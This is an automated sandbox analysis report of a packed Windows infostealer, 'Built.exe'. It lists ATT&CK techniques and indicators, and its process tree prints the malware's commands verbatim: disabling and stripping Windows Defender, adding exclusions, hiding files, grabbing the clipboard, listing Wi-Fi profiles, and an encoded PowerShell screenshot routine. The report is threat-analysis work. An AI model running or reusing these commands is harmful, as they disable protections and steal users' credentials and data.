ec139b5ea1970240ce1cc9ed8c746f3d7213f93437aaf688b3bd61067db04fab

Analysis

max time kernel
147s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
24-11-2024 20:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

7.5MB
MD5

aa87683fe01b6d45f2af3c29ba04cbc1
SHA1

5975f043228e1b8e546bd15918d653013179f339
SHA256

ec139b5ea1970240ce1cc9ed8c746f3d7213f93437aaf688b3bd61067db04fab
SHA512

afff624b9a829468177d699439b1b555077fc219e91c014d82ca018699a32523a08171917c46b630f30b85e6171172d75172558249365256fb9bc1291c6ac2ba
SSDEEP

196608:yzgVVEqLwfI9jUC2gYBYv3vbW2+iITx1U6nt:1VVEVIH2gYBgDWJTnzt

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2660	powershell.exe
4752	powershell.exe
3520	powershell.exe
3832	powershell.exe
2524	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4660	cmd.exe
3124	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4416	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
1556	Built.exe
1556	Built.exe
1556	Built.exe
1556	Built.exe
1556	Built.exe
1556	Built.exe
1556	Built.exe
1556	Built.exe
1556	Built.exe
1556	Built.exe
1556	Built.exe
1556	Built.exe
1556	Built.exe
1556	Built.exe
1556	Built.exe
1556	Built.exe
1556	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	discord.com
6	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4916	tasklist.exe
584	tasklist.exe
3368	tasklist.exe
4608	tasklist.exe
2992	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1032	cmd.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x001900000002ab69-21.dat	upx
behavioral2/memory/1556-25-0x00007FF8DB730000-0x00007FF8DBDF5000-memory.dmp	upx
behavioral2/files/0x004600000002ab56-27.dat	upx
behavioral2/memory/1556-30-0x00007FF8DFF60000-0x00007FF8DFF85000-memory.dmp	upx
behavioral2/memory/1556-48-0x00007FF8E4A50000-0x00007FF8E4A5F000-memory.dmp	upx
behavioral2/files/0x001900000002ab5f-47.dat	upx
behavioral2/files/0x001900000002ab64-33.dat	upx
behavioral2/files/0x001900000002ab5c-44.dat	upx
behavioral2/files/0x001900000002ab59-43.dat	upx
behavioral2/files/0x001900000002ab58-42.dat	upx
behavioral2/files/0x001c00000002ab57-41.dat	upx
behavioral2/files/0x001b00000002ab53-40.dat	upx
behavioral2/files/0x001900000002ab6e-39.dat	upx
behavioral2/files/0x001900000002ab6d-38.dat	upx
behavioral2/files/0x001900000002ab6c-37.dat	upx
behavioral2/files/0x001900000002ab5e-46.dat	upx
behavioral2/files/0x001c00000002ab5d-45.dat	upx
behavioral2/files/0x001000000002ab68-34.dat	upx
behavioral2/files/0x001900000002ab65-31.dat	upx
behavioral2/memory/1556-54-0x00007FF8DFF30000-0x00007FF8DFF5D000-memory.dmp	upx
behavioral2/memory/1556-56-0x00007FF8E4A00000-0x00007FF8E4A1A000-memory.dmp	upx
behavioral2/memory/1556-58-0x00007FF8DF920000-0x00007FF8DF944000-memory.dmp	upx
behavioral2/memory/1556-60-0x00007FF8DBFE0000-0x00007FF8DC15F000-memory.dmp	upx
behavioral2/memory/1556-63-0x00007FF8E49B0000-0x00007FF8E49C9000-memory.dmp	upx
behavioral2/memory/1556-64-0x00007FF8E47C0000-0x00007FF8E47CD000-memory.dmp	upx
behavioral2/memory/1556-66-0x00007FF8DF8E0000-0x00007FF8DF913000-memory.dmp	upx
behavioral2/memory/1556-70-0x00007FF8DB730000-0x00007FF8DBDF5000-memory.dmp	upx
behavioral2/memory/1556-71-0x00007FF8DB660000-0x00007FF8DB72E000-memory.dmp	upx
behavioral2/memory/1556-74-0x00007FF8DFF60000-0x00007FF8DFF85000-memory.dmp	upx
behavioral2/memory/1556-73-0x00007FF8D7D40000-0x00007FF8D8273000-memory.dmp	upx
behavioral2/memory/1556-76-0x00007FF8E1300000-0x00007FF8E1314000-memory.dmp	upx
behavioral2/memory/1556-79-0x00007FF8E1150000-0x00007FF8E115D000-memory.dmp	upx
behavioral2/memory/1556-78-0x00007FF8DFF30000-0x00007FF8DFF5D000-memory.dmp	upx
behavioral2/memory/1556-81-0x00007FF8E4A00000-0x00007FF8E4A1A000-memory.dmp	upx
behavioral2/memory/1556-82-0x00007FF8DB540000-0x00007FF8DB65A000-memory.dmp	upx
behavioral2/memory/1556-106-0x00007FF8DF920000-0x00007FF8DF944000-memory.dmp	upx
behavioral2/memory/1556-107-0x00007FF8DBFE0000-0x00007FF8DC15F000-memory.dmp	upx
behavioral2/memory/1556-304-0x00007FF8DF8E0000-0x00007FF8DF913000-memory.dmp	upx
behavioral2/memory/1556-306-0x00007FF8DB660000-0x00007FF8DB72E000-memory.dmp	upx
behavioral2/memory/1556-322-0x00007FF8D7D40000-0x00007FF8D8273000-memory.dmp	upx
behavioral2/memory/1556-348-0x00007FF8DBFE0000-0x00007FF8DC15F000-memory.dmp	upx
behavioral2/memory/1556-342-0x00007FF8DB730000-0x00007FF8DBDF5000-memory.dmp	upx
behavioral2/memory/1556-343-0x00007FF8DFF60000-0x00007FF8DFF85000-memory.dmp	upx
behavioral2/memory/1556-364-0x00007FF8E49B0000-0x00007FF8E49C9000-memory.dmp	upx
behavioral2/memory/1556-357-0x00007FF8DB730000-0x00007FF8DBDF5000-memory.dmp	upx
behavioral2/memory/1556-381-0x00007FF8DB660000-0x00007FF8DB72E000-memory.dmp	upx
behavioral2/memory/1556-380-0x00007FF8DF8E0000-0x00007FF8DF913000-memory.dmp	upx
behavioral2/memory/1556-379-0x00007FF8E47C0000-0x00007FF8E47CD000-memory.dmp	upx
behavioral2/memory/1556-378-0x00007FF8DBFE0000-0x00007FF8DC15F000-memory.dmp	upx
behavioral2/memory/1556-377-0x00007FF8DF920000-0x00007FF8DF944000-memory.dmp	upx
behavioral2/memory/1556-376-0x00007FF8E4A00000-0x00007FF8E4A1A000-memory.dmp	upx
behavioral2/memory/1556-375-0x00007FF8DFF30000-0x00007FF8DFF5D000-memory.dmp	upx
behavioral2/memory/1556-374-0x00007FF8E4A50000-0x00007FF8E4A5F000-memory.dmp	upx
behavioral2/memory/1556-373-0x00007FF8DFF60000-0x00007FF8DFF85000-memory.dmp	upx
behavioral2/memory/1556-372-0x00007FF8D7D40000-0x00007FF8D8273000-memory.dmp	upx
behavioral2/memory/1556-371-0x00007FF8DB540000-0x00007FF8DB65A000-memory.dmp	upx
behavioral2/memory/1556-370-0x00007FF8E1150000-0x00007FF8E115D000-memory.dmp	upx
behavioral2/memory/1556-369-0x00007FF8E1300000-0x00007FF8E1314000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3192	cmd.exe
3136	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4288	cmd.exe
3092	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3380	WMIC.exe
2948	WMIC.exe
4888	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4984	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3136	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
3832	powershell.exe
2660	powershell.exe
3832	powershell.exe
2660	powershell.exe
2524	powershell.exe
2524	powershell.exe
3124	powershell.exe
3124	powershell.exe
2380	powershell.exe
2380	powershell.exe
3124	powershell.exe
2380	powershell.exe
4752	powershell.exe
4752	powershell.exe
1132	powershell.exe
1132	powershell.exe
3520	powershell.exe
3520	powershell.exe
4664	powershell.exe
4664	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	584	tasklist.exe
Token: SeDebugPrivilege	3832	powershell.exe
Token: SeDebugPrivilege	2660	powershell.exe
Token: SeIncreaseQuotaPrivilege	3468	WMIC.exe
Token: SeSecurityPrivilege	3468	WMIC.exe
Token: SeTakeOwnershipPrivilege	3468	WMIC.exe
Token: SeLoadDriverPrivilege	3468	WMIC.exe
Token: SeSystemProfilePrivilege	3468	WMIC.exe
Token: SeSystemtimePrivilege	3468	WMIC.exe
Token: SeProfSingleProcessPrivilege	3468	WMIC.exe
Token: SeIncBasePriorityPrivilege	3468	WMIC.exe
Token: SeCreatePagefilePrivilege	3468	WMIC.exe
Token: SeBackupPrivilege	3468	WMIC.exe
Token: SeRestorePrivilege	3468	WMIC.exe
Token: SeShutdownPrivilege	3468	WMIC.exe
Token: SeDebugPrivilege	3468	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3468	WMIC.exe
Token: SeRemoteShutdownPrivilege	3468	WMIC.exe
Token: SeUndockPrivilege	3468	WMIC.exe
Token: SeManageVolumePrivilege	3468	WMIC.exe
Token: 33	3468	WMIC.exe
Token: 34	3468	WMIC.exe
Token: 35	3468	WMIC.exe
Token: 36	3468	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3468	WMIC.exe
Token: SeSecurityPrivilege	3468	WMIC.exe
Token: SeTakeOwnershipPrivilege	3468	WMIC.exe
Token: SeLoadDriverPrivilege	3468	WMIC.exe
Token: SeSystemProfilePrivilege	3468	WMIC.exe
Token: SeSystemtimePrivilege	3468	WMIC.exe
Token: SeProfSingleProcessPrivilege	3468	WMIC.exe
Token: SeIncBasePriorityPrivilege	3468	WMIC.exe
Token: SeCreatePagefilePrivilege	3468	WMIC.exe
Token: SeBackupPrivilege	3468	WMIC.exe
Token: SeRestorePrivilege	3468	WMIC.exe
Token: SeShutdownPrivilege	3468	WMIC.exe
Token: SeDebugPrivilege	3468	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3468	WMIC.exe
Token: SeRemoteShutdownPrivilege	3468	WMIC.exe
Token: SeUndockPrivilege	3468	WMIC.exe
Token: SeManageVolumePrivilege	3468	WMIC.exe
Token: 33	3468	WMIC.exe
Token: 34	3468	WMIC.exe
Token: 35	3468	WMIC.exe
Token: 36	3468	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3380	WMIC.exe
Token: SeSecurityPrivilege	3380	WMIC.exe
Token: SeTakeOwnershipPrivilege	3380	WMIC.exe
Token: SeLoadDriverPrivilege	3380	WMIC.exe
Token: SeSystemProfilePrivilege	3380	WMIC.exe
Token: SeSystemtimePrivilege	3380	WMIC.exe
Token: SeProfSingleProcessPrivilege	3380	WMIC.exe
Token: SeIncBasePriorityPrivilege	3380	WMIC.exe
Token: SeCreatePagefilePrivilege	3380	WMIC.exe
Token: SeBackupPrivilege	3380	WMIC.exe
Token: SeRestorePrivilege	3380	WMIC.exe
Token: SeShutdownPrivilege	3380	WMIC.exe
Token: SeDebugPrivilege	3380	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3380	WMIC.exe
Token: SeRemoteShutdownPrivilege	3380	WMIC.exe
Token: SeUndockPrivilege	3380	WMIC.exe
Token: SeManageVolumePrivilege	3380	WMIC.exe
Token: 33	3380	WMIC.exe
Token: 34	3380	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1184 wrote to memory of 1556	1184	Built.exe	78
PID 1184 wrote to memory of 1556	1184	Built.exe	78
PID 1556 wrote to memory of 3424	1556	Built.exe	79
PID 1556 wrote to memory of 3424	1556	Built.exe	79
PID 1556 wrote to memory of 4508	1556	Built.exe	80
PID 1556 wrote to memory of 4508	1556	Built.exe	80
PID 1556 wrote to memory of 4132	1556	Built.exe	81
PID 1556 wrote to memory of 4132	1556	Built.exe	81
PID 1556 wrote to memory of 1500	1556	Built.exe	85
PID 1556 wrote to memory of 1500	1556	Built.exe	85
PID 3424 wrote to memory of 3832	3424	cmd.exe	86
PID 3424 wrote to memory of 3832	3424	cmd.exe	86
PID 1500 wrote to memory of 584	1500	cmd.exe	87
PID 1500 wrote to memory of 584	1500	cmd.exe	87
PID 4508 wrote to memory of 2660	4508	cmd.exe	88
PID 4508 wrote to memory of 2660	4508	cmd.exe	88
PID 4132 wrote to memory of 4004	4132	cmd.exe	89
PID 4132 wrote to memory of 4004	4132	cmd.exe	89
PID 1556 wrote to memory of 2744	1556	Built.exe	91
PID 1556 wrote to memory of 2744	1556	Built.exe	91
PID 2744 wrote to memory of 3468	2744	cmd.exe	92
PID 2744 wrote to memory of 3468	2744	cmd.exe	92
PID 1556 wrote to memory of 2692	1556	Built.exe	93
PID 1556 wrote to memory of 2692	1556	Built.exe	93
PID 2692 wrote to memory of 4012	2692	cmd.exe	94
PID 2692 wrote to memory of 4012	2692	cmd.exe	94
PID 1556 wrote to memory of 1180	1556	Built.exe	95
PID 1556 wrote to memory of 1180	1556	Built.exe	95
PID 1180 wrote to memory of 3876	1180	cmd.exe	96
PID 1180 wrote to memory of 3876	1180	cmd.exe	96
PID 1556 wrote to memory of 2392	1556	Built.exe	97
PID 1556 wrote to memory of 2392	1556	Built.exe	97
PID 2392 wrote to memory of 3380	2392	cmd.exe	98
PID 2392 wrote to memory of 3380	2392	cmd.exe	98
PID 1556 wrote to memory of 3880	1556	Built.exe	99
PID 1556 wrote to memory of 3880	1556	Built.exe	99
PID 3880 wrote to memory of 2948	3880	cmd.exe	100
PID 3880 wrote to memory of 2948	3880	cmd.exe	100
PID 1556 wrote to memory of 1032	1556	Built.exe	101
PID 1556 wrote to memory of 1032	1556	Built.exe	101
PID 1556 wrote to memory of 5040	1556	Built.exe	103
PID 1556 wrote to memory of 5040	1556	Built.exe	103
PID 1032 wrote to memory of 3820	1032	cmd.exe	105
PID 1032 wrote to memory of 3820	1032	cmd.exe	105
PID 5040 wrote to memory of 2524	5040	cmd.exe	106
PID 5040 wrote to memory of 2524	5040	cmd.exe	106
PID 1556 wrote to memory of 484	1556	Built.exe	107
PID 1556 wrote to memory of 484	1556	Built.exe	107
PID 1556 wrote to memory of 2976	1556	Built.exe	108
PID 1556 wrote to memory of 2976	1556	Built.exe	108
PID 484 wrote to memory of 3368	484	cmd.exe	109
PID 484 wrote to memory of 3368	484	cmd.exe	109
PID 2976 wrote to memory of 4608	2976	cmd.exe	110
PID 2976 wrote to memory of 4608	2976	cmd.exe	110
PID 1556 wrote to memory of 3244	1556	Built.exe	111
PID 1556 wrote to memory of 3244	1556	Built.exe	111
PID 3244 wrote to memory of 3416	3244	cmd.exe	112
PID 3244 wrote to memory of 3416	3244	cmd.exe	112
PID 1556 wrote to memory of 4660	1556	Built.exe	113
PID 1556 wrote to memory of 4660	1556	Built.exe	113
PID 1556 wrote to memory of 4580	1556	Built.exe	114
PID 1556 wrote to memory of 4580	1556	Built.exe	114
PID 4660 wrote to memory of 3124	4660	cmd.exe	115
PID 4660 wrote to memory of 3124	4660	cmd.exe	115

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3820	attrib.exe
3236	attrib.exe
1840	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1184
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3424
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4508
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('404 Error!', 0, '404', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4132
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('404 Error!', 0, '404', 0+16);close()"
      4⤵
      PID:4004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1500
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2744
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1180
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2392
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3880
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1032
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      4⤵
      Views/modifies file attributes
      PID:3820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‎.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5040
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‎.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:484
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2976
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3244
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4660
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4580
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2424
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4288
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2924
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1992
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:3164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBu